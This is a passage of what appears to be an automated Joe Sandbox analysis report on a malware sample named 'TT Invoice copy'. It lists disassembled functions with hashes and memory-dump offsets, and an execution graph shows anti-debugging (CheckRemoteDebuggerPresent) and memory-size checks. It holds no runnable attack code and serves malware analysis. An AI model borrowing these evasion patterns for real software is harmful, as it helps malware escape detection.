                                                                                  • Instruction Fuzzy Hash: 9611A4B1D106189BEB18CF9BC9557DEFEF7AFC8300F14C06AD40966254DBB509468F90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526C498 Relevance: .0, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a374399ff0848fab26f5315b2f743accda70dee2160780c00f89fa62d2c404f
                                                                                  • Instruction ID: 8e664e2192910b69048a91fcb82d68a37862bd3a4593e5a434e6f98057e66fb9
                                                                                  • Opcode Fuzzy Hash: 1a374399ff0848fab26f5315b2f743accda70dee2160780c00f89fa62d2c404f
                                                                                  • Instruction Fuzzy Hash: A6110670D24218DFC708EFAAC4449ADBBB6BF89310F04A069E419B7251CB759981CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009AD745 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3faf03663a6d5f19160856110f6d28d45cc18fcee15ece17dd3a9fb21abb706b
                                                                                  • Instruction ID: 1a763084dd661d66cf4dce6880edf07e6eb91118df5579e658f9483247e2e70b
                                                                                  • Opcode Fuzzy Hash: 3faf03663a6d5f19160856110f6d28d45cc18fcee15ece17dd3a9fb21abb706b
                                                                                  • Instruction Fuzzy Hash: 8A012BB100A3409AE7144E29CD84B67FFDCDF42334F18C92AED0A4A696C679D840C6F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526C8A0 Relevance: .0, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d590772ad9bc9357eea290da32ebc5d99f22897a2798dd8141eb448086d86818
                                                                                  • Instruction ID: 25e0724ec4b27cf3a828c20dd2ed2b89c5f814d6fdd5d0defc14735a1ce7b01a
                                                                                  • Opcode Fuzzy Hash: d590772ad9bc9357eea290da32ebc5d99f22897a2798dd8141eb448086d86818
                                                                                  • Instruction Fuzzy Hash: 72014B38A29108EFC704EFA8C584AACBBF6EF49300F14D094E449AB311CB709E40DB40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526C828 Relevance: .0, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58791f6108573da24a92a2c718398cba6b5d772d6ac7df32deb3e2b6a23ec2ab
                                                                                  • Instruction ID: 67fae8e4fdba4e565beda1cc1861accfaabed79ff322b5aa28cdc4d35b720fae
                                                                                  • Opcode Fuzzy Hash: 58791f6108573da24a92a2c718398cba6b5d772d6ac7df32deb3e2b6a23ec2ab
                                                                                  • Instruction Fuzzy Hash: E7F0AF7092D108DBC715EF5AC4449BCFBBAAF4A300F10E1A894496B212DBB09E81DB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526DE38 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 390cf772060e26781fe224c9d0b896a67d532cac37045cf7392e1a5e591e8b12
                                                                                  • Instruction ID: f3f1b9c4b2a650f1742b83dd52ae97d5900275e82fdd011678ca4ca56379d466
                                                                                  • Opcode Fuzzy Hash: 390cf772060e26781fe224c9d0b896a67d532cac37045cf7392e1a5e591e8b12
                                                                                  • Instruction Fuzzy Hash: 6BF0A470A28149CFD740FFA4D4557ADBFBEAF44300F009825E01662295CF74548ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 009AD744 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 88c20717e6173280a3f5484cf6dac167f96d02ce6f0e8484f20653b5f8f2f460
                                                                                  • Instruction ID: 3e1d66939da29f3b6dc896d1d6dd979d9ee52d6ca21ab5afcbbc94d01c887fe3
                                                                                  • Opcode Fuzzy Hash: 88c20717e6173280a3f5484cf6dac167f96d02ce6f0e8484f20653b5f8f2f460
                                                                                  • Instruction Fuzzy Hash: 41F062714053449AEB148E1AC888B62FFACEB51734F18C45AED094A696C6799844CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267AC8 Relevance: .0, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e12268d11e81925302baed7b54e4afc82c880d697ef72d989ba91d0b5ab8b70d
                                                                                  • Instruction ID: 921aab7e3122ac11f77120de4229260bc56542305f644630edb1c41ac94a79de
                                                                                  • Opcode Fuzzy Hash: e12268d11e81925302baed7b54e4afc82c880d697ef72d989ba91d0b5ab8b70d
                                                                                  • Instruction Fuzzy Hash: 81F0C2B4A202068FC704CF58D444AAFBFF1EF48318F0886AD9111DB281CB759444CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526696B Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8a55bd8d82e38b22a6a227c3772b54c1214ae92c5249d2e7862535f6c899bfba
                                                                                  • Instruction ID: 0e58fffda24fa7eceedd26ec29015eca68053b2d06c555d5e290b7db44a935c9
                                                                                  • Opcode Fuzzy Hash: 8a55bd8d82e38b22a6a227c3772b54c1214ae92c5249d2e7862535f6c899bfba
                                                                                  • Instruction Fuzzy Hash: DCF03072714009AF9F08DF58D8848AE7FFAEF88254F14817AE409D7224E631E9918B50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267AD8 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9d8537e8ed3ed2a8948ea273353293753fbb79eb41db12a7d96d40051a94baf
                                                                                  • Instruction ID: 8095f02bbf0fe9b6059ec9c11efc00e6cc3d6d723f9fe133351417b8a3a3f5ff
                                                                                  • Opcode Fuzzy Hash: b9d8537e8ed3ed2a8948ea273353293753fbb79eb41db12a7d96d40051a94baf
                                                                                  • Instruction Fuzzy Hash: FDF0DAB0D1420A9FDB44DFA9D841ABEBBF5FF48304F1485A9D918E7305D77495448F90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267A80 Relevance: .0, Instructions: 18COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d9649355ae1d32c66a2bbbf5ba1ace4db618409b049eec78f435a72799d739d2
                                                                                  • Instruction ID: 0acffa68cbb1c0e25a3b7a62ea0992cc6f02ce48f9fa59929f858f06ed20d898
                                                                                  • Opcode Fuzzy Hash: d9649355ae1d32c66a2bbbf5ba1ace4db618409b049eec78f435a72799d739d2
                                                                                  • Instruction Fuzzy Hash: 8CE046B4D10209DFC740EFB9CA04A5EBBF2FF08604F1084A9C018E7311E7B08A008F90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05267B78 Relevance: .0, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14ebb80853817b1648bab3c935d5440db5449410ac6f7c75c36e53709baea02c
                                                                                  • Instruction ID: aec4791b929075b3d523cdc70be71b1efa4e020a91f4a9e9a57aabfb8070a622
                                                                                  • Opcode Fuzzy Hash: 14ebb80853817b1648bab3c935d5440db5449410ac6f7c75c36e53709baea02c
                                                                                  • Instruction Fuzzy Hash: 5ED012322502099E8B40EF96F840C567BDDBF247143808432E508C7131F621E468EF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526A1A8 Relevance: .0, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c3503f84514922606af0ecf146ba6cb0bc6ab61f083833edf5234d84bb5bbc5
                                                                                  • Instruction ID: 7ddfdfa3f347271e4a3332ce20439ec9138969dbc3ddae6b328261c38c26abb2
                                                                                  • Opcode Fuzzy Hash: 1c3503f84514922606af0ecf146ba6cb0bc6ab61f083833edf5234d84bb5bbc5
                                                                                  • Instruction Fuzzy Hash: F9C08C300662098BC20437A8F81E32C3F68BB06222F842421B40D11020CF681093CA22
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05266938 Relevance: .0, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dca9ef69b403dc57768a7eaaf498f5696ec65ecf36a3781063450a20d758460b
                                                                                  • Instruction ID: aa62458a2ae83fdc3687de9aac6dd0de6d416117dc5cb32d7ecde1eea67edc14
                                                                                  • Opcode Fuzzy Hash: dca9ef69b403dc57768a7eaaf498f5696ec65ecf36a3781063450a20d758460b
                                                                                  • Instruction Fuzzy Hash: 0AC09B57B7A7C14ED30756200C564452F114E7361CB7954F34991DB663E044D99EC26F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526583C Relevance: .0, Instructions: 8COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d2c6e385818f709508257803763e2014cb608190d09436b0272df1694c42ca4b
                                                                                  • Instruction ID: b80cab0670980cc455d0b0499bd3944b11c84d14cb84c42e2020d77854fd1713
                                                                                  • Opcode Fuzzy Hash: d2c6e385818f709508257803763e2014cb608190d09436b0272df1694c42ca4b
                                                                                  • Instruction Fuzzy Hash: 9CB0123A3F5501B6940863648AD892FD811EFF5700FC09C127389C846484B0D4E5913B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 00E36780 Relevance: 1.6, Strings: 1, Instructions: 351COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: n
                                                                                  • API String ID: 0-3297054318
                                                                                  • Opcode ID: 2c1dd4e916f23fcd49ebfeabc215ca817e36709dfb4d8718b74ccdb966510260
                                                                                  • Instruction ID: 17a4491b32a0e6b52ab4d2ffbdd8941af8c920dc153ccc69e0a82cfd8a8460f7
                                                                                  • Opcode Fuzzy Hash: 2c1dd4e916f23fcd49ebfeabc215ca817e36709dfb4d8718b74ccdb966510260
                                                                                  • Instruction Fuzzy Hash: 39D1DC71B007049FDB29DB75C814BAEBBFAAF89304F10946DE146EB2A1DB34E941CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E30478 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h!
                                                                                  • API String ID: 0-64874769
                                                                                  • Opcode ID: 95d7b13b1bde147658c059a6c7a04ab5378b679366008b6397544639d741b1cb
                                                                                  • Instruction ID: 10bc720a678e35b358141fdfa1ed005e41515d7b00f15e5e71d443299934a87a
                                                                                  • Opcode Fuzzy Hash: 95d7b13b1bde147658c059a6c7a04ab5378b679366008b6397544639d741b1cb
                                                                                  • Instruction Fuzzy Hash: 2EE1E974E001598FCB14DFA9C5949AEFBF2FF89304F249169E415AB35AD730A981CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E67790 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'^q
                                                                                  • API String ID: 0-1614139903
                                                                                  • Opcode ID: 4aacdf2242f34d2960430f3ad7aab37b46642507c3ab8e7e881211586f2e6816
                                                                                  • Instruction ID: 4de8a27ce54bed3322db8cf494cbbe896d06a31bddec1539d076ead6af04f88e
                                                                                  • Opcode Fuzzy Hash: 4aacdf2242f34d2960430f3ad7aab37b46642507c3ab8e7e881211586f2e6816
                                                                                  • Instruction Fuzzy Hash: FA611C70E05208CFD749DF7AE98079EBBF2BBC9300F14C629D005AB369EB7459059B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526E638 Relevance: .3, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 82f6167f0da3a9e0f2fa82fe98f51789aefc9c4ac2950c5879090874019e6097
                                                                                  • Instruction ID: 0009b08fc419c603605be3d5d54cb8d61a293e9ec7ae7c24f708f8cd5c18b6f9
                                                                                  • Opcode Fuzzy Hash: 82f6167f0da3a9e0f2fa82fe98f51789aefc9c4ac2950c5879090874019e6097
                                                                                  • Instruction Fuzzy Hash: 7CE11974E101598FCB14DFA9C5809AEFBF6BF88304F24C169E419AB356DB30A981CF61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526EEA8 Relevance: .3, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed1afb4390902c3371372c27b9a3d9fb4e83b2224e17dfe93d5c7af14be4b0db
                                                                                  • Instruction ID: 352fc7c86e26be8fd1605b00b6dd9a8ef38af8f73fd99d1cd366a514faa38f1d
                                                                                  • Opcode Fuzzy Hash: ed1afb4390902c3371372c27b9a3d9fb4e83b2224e17dfe93d5c7af14be4b0db
                                                                                  • Instruction Fuzzy Hash: CFE11B74E141598FCB14DFA9D5809AEFBF2BF89304F24C169D419AB35AD730A981CF60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0526EA70 Relevance: .3, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d0cc06c0f9cef7b4b32803a91e95628f45ae93e3b7a9145341ac41fdce5a320
                                                                                  • Instruction ID: f064a15d3891c2e615fff5759da7071990dd6d4dfd2d24d5616cd4c3d99b3faa
                                                                                  • Opcode Fuzzy Hash: 9d0cc06c0f9cef7b4b32803a91e95628f45ae93e3b7a9145341ac41fdce5a320
                                                                                  • Instruction Fuzzy Hash: C1E10874E101598FCB14DFA9C5809AEFBF6BF89304F24C169E419AB356D730A981CF61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E30040 Relevance: .3, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db4a564612cabe87770bf39404d0feebce7fe8c0ef95874d6e978637eaf500e9
                                                                                  • Instruction ID: 82786b0c195af90aa0f0bf29ac7708fefedad8b6a868b48984eaaab302c46147
                                                                                  • Opcode Fuzzy Hash: db4a564612cabe87770bf39404d0feebce7fe8c0ef95874d6e978637eaf500e9
                                                                                  • Instruction Fuzzy Hash: 31E10674E001598FCB14DFA9C5949AEFBF2FF89304F249169E419AB316DB30A981CF60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05265F2F Relevance: .3, Instructions: 267COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0887fc850682f74e1e0008bacf9979a2611408a8855d36296d6929ea95867c44
                                                                                  • Instruction ID: 1a60d5ad89b20ed72c6861ba9ce649dd5f0e13efef31cd7562c4e57aa73f5064
                                                                                  • Opcode Fuzzy Hash: 0887fc850682f74e1e0008bacf9979a2611408a8855d36296d6929ea95867c44
                                                                                  • Instruction Fuzzy Hash: 04D1073192065A8ACB00EFA4D990A9DF771FFD5300F60D79AE1093B255EF706AC9CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05265F40 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10249d67277fbf3fa589ae6f11fdae65d2984d87387ca3fa6af1d57ea980698d
                                                                                  • Instruction ID: d4c7e5d9237944ff76b81830b66ab73ffbb841fc5bd7822e040bcc47ffdcd087
                                                                                  • Opcode Fuzzy Hash: 10249d67277fbf3fa589ae6f11fdae65d2984d87387ca3fa6af1d57ea980698d
                                                                                  • Instruction Fuzzy Hash: 77D1073192065A8ACB00EFA4D990A9DF771FFD5300F60D79AE1093B255EF706AC9CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:9.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:21.4%
                                                                                  Total number of Nodes:14
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 24606 10170b0 24607 10170f4 CheckRemoteDebuggerPresent 24606->24607 24608 1017136 24607->24608 24609 566cb70 24610 566cba5 24609->24610 24611 566cb7d 24609->24611 24617 566c2e4 24610->24617 24613 566cbc6 24615 566cc8e GlobalMemoryStatusEx 24616 566ccbe 24615->24616 24618 566cc48 GlobalMemoryStatusEx 24617->24618 24620 566cbc2 24618->24620 24620->24613 24620->24615 24621 566e998 DuplicateHandle 24622 566ea2e 24621->24622

                                                                                  Executed Functions

                                                                                  Function 010170B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1144 10170b0-1017134 CheckRemoteDebuggerPresent 1146 1017136-101713c 1144->1146 1147 101713d-1017178 1144->1147 1146->1147
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01017127
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887713361.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1010000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 63a61b7d12debc160976b8f8b43bb7d124cb6f53ccae959aadcc82c548ec2dc7
                                                                                  • Instruction ID: ca672b278823c33da5c347168baeb5fe275fa5677ba66b0355d5d73e1f025335
                                                                                  • Opcode Fuzzy Hash: 63a61b7d12debc160976b8f8b43bb7d124cb6f53ccae959aadcc82c548ec2dc7
                                                                                  • Instruction Fuzzy Hash: 642148B1800259CFCB10CF9AD444BEEFBF4AF49320F14846AE458A3251C738A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0566CB70 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1107 566cb70-566cb7b 1108 566cba5-566cbc4 call 566c2e4 1107->1108 1109 566cb7d-566cba4 call 566c2d8 1107->1109 1115 566cbc6-566cbc9 1108->1115 1116 566cbca-566cc29 1108->1116 1123 566cc2f-566ccbc GlobalMemoryStatusEx 1116->1123 1124 566cc2b-566cc2e 1116->1124 1128 566ccc5-566cced 1123->1128 1129 566ccbe-566ccc4 1123->1129 1129->1128
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2897618440.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5660000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e3499aac6aeea7e25cbade649e05f33a82fcc19d5b608fcbe03603e5fcfa09b
                                                                                  • Instruction ID: 80621a83e89ee2c70e1d544e39ddc993c768ffe8ba57bb735ee0521628c7a43c
                                                                                  • Opcode Fuzzy Hash: 4e3499aac6aeea7e25cbade649e05f33a82fcc19d5b608fcbe03603e5fcfa09b
                                                                                  • Instruction Fuzzy Hash: F1411032E047998FCB14DFB9D81469EBFF5EF89220F14856AD848A7241DB789844CBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 010170A8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1132 10170a8-1017134 CheckRemoteDebuggerPresent 1134 1017136-101713c 1132->1134 1135 101713d-1017178 1132->1135 1134->1135
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01017127
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2887713361.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1010000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 20b16ede8788145796c412a930b80cf176e4e3913d88ec0bc9d606fdbf25ead9
                                                                                  • Instruction ID: eafb7accf2dc6c86a5ee44561255f555efc6ab8ad31178c77b8de6cdac3ac6e4
                                                                                  • Opcode Fuzzy Hash: 20b16ede8788145796c412a930b80cf176e4e3913d88ec0bc9d606fdbf25ead9
                                                                                  • Instruction Fuzzy Hash: 122166B5800259CFCB10CFA9D484BEEBBF4EF49320F24846EE499A7251C338A944CF64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

